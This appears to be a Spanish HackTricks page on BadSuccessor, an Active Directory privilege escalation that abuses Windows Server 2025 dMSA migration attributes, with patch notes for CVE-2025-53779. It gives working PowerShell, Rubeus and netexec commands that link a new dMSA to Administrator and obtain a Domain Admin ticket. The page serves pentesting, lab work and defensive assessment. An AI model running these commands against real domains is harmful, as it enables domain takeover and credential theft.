BadSuccessor
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Revisa el catálogo completo de HackTricks Training para las rutas de evaluación (ARTA/GRTA/AzRTA) y Linux Hacking Expert (LHE).
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord, al grupo de telegram, sigue @hacktricks_live en X/Twitter, o revisa la página de LinkedIn y el canal de YouTube.
- Comparte hacking tricks enviando PRs a los repositorios de github HackTricks y HackTricks Cloud.
Overview
BadSuccessor abusa del flujo de trabajo de migración de delegated Managed Service Account (dMSA) introducido en Windows Server 2025. Un dMSA puede vincularse a una cuenta heredada mediante msDS-ManagedAccountPrecededByLink y moverse a través de los estados de migración almacenados en msDS-DelegatedMSAState. Si un atacante puede crear un dMSA en una OU con permisos de escritura y controlar esos atributos, el KDC puede emitir tickets para el dMSA controlado por el atacante con el authorization context de la cuenta vinculada.
En la práctica, esto significa que un usuario de bajo privilegio que solo tiene derechos delegados sobre una OU puede crear un nuevo dMSA, apuntarlo a Administrator, completar el estado de migración y luego obtener un TGT cuyo PAC contiene grupos privilegiados como Domain Admins.
dMSA migration details that matter
- dMSA es una feature de Windows Server 2025.
Start-ADServiceAccountMigrationestablece la migración en estado started.Complete-ADServiceAccountMigrationestablece la migración en estado completed.msDS-DelegatedMSAState = 1significa que la migración ha comenzado.msDS-DelegatedMSAState = 2significa que la migración se ha completado.- Durante una migración legítima, se supone que el dMSA reemplaza de forma transparente a la cuenta suplantada, por lo que el KDC/LSA preservan el acceso que la cuenta anterior ya tenía.
Microsoft Learn también señala que durante la migración la cuenta original queda vinculada al dMSA y que el dMSA está destinado a acceder a lo que la cuenta antigua podía acceder. Esta es la suposición de seguridad que BadSuccessor abusa.
Requirements
- Un dominio donde existe dMSA, lo que significa que hay soporte de Windows Server 2025 en la parte de AD.
- El atacante puede crear objetos
msDS-DelegatedManagedServiceAccounten alguna OU, o tiene derechos equivalentes amplios para crear objetos hijos allí. - El atacante puede escribir los atributos relevantes del dMSA o controlar completamente el dMSA que acaba de crear.
- El atacante puede solicitar tickets Kerberos desde un contexto unido al dominio o desde un túnel que alcance LDAP/Kerberos.
Practical checks
La señal operativa más limpia es verificar el nivel de dominio/bosque y confirmar que el entorno ya está usando la nueva stack de Server 2025:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Si ves valores como Windows2025Domain y Windows2025Forest, trata BadSuccessor / dMSA migration abuse como una comprobación prioritaria.
También puedes enumerar OUs escribibles delegadas para la creación de dMSA con herramientas públicas:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Flujo de abuso
- Crea una dMSA en una OU donde tengas derechos delegados de create-child.
- Establece
msDS-ManagedAccountPrecededByLinken el DN de un objetivo privilegiado comoCN=Administrator,CN=Users,DC=corp,DC=local. - Establece
msDS-DelegatedMSAStateen2para marcar la migración como completada. - Solicita un TGT para la nueva dMSA y usa el ticket devuelto para acceder a servicios privilegiados.
Ejemplo de PowerShell:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Solicitud de ticket / ejemplos de herramientas operativas:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Por qué esto es más que privilege escalation
Durante una migración legítima, Windows también necesita que el nuevo dMSA gestione tickets que se emitieron para la cuenta anterior antes del cutover. Por eso el material relacionado con dMSA puede incluir claves actuales y anteriores en el flujo KERB-DMSA-KEY-PACKAGE.
Para una migración falsa controlada por un atacante, ese comportamiento puede convertir BadSuccessor en:
- Privilege escalation al heredar SIDs de grupos privilegiados en el PAC.
- Exposición de material de credenciales porque el manejo de la clave anterior puede exponer material equivalente al RC4/NT hash del predecesor en flujos vulnerables.
Eso hace que la técnica sea útil tanto para la toma de control directa del dominio como para operaciones posteriores, como pass-the-hash o un compromiso más amplio de credenciales.
Notas sobre el estado del parche
El comportamiento original de BadSuccessor no es solo un problema teórico de la preview de 2025. Microsoft le asignó CVE-2025-53779 y publicó una actualización de seguridad en agosto de 2025. Mantén este ataque documentado para:
- labs / CTFs / ejercicios assume-breach
- entornos Windows Server 2025 sin parchear
- validación de delegaciones de OU y exposición de dMSA durante assessments
No asumas que un dominio de Windows Server 2025 es vulnerable solo porque exista dMSA; verifica el nivel de parche y prueba con cuidado.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Aprende y practica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Revisa el catálogo completo de HackTricks Training para las rutas de evaluación (ARTA/GRTA/AzRTA) y Linux Hacking Expert (LHE).
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord, al grupo de telegram, sigue @hacktricks_live en X/Twitter, o revisa la página de LinkedIn y el canal de YouTube.
- Comparte hacking tricks enviando PRs a los repositorios de github HackTricks y HackTricks Cloud.


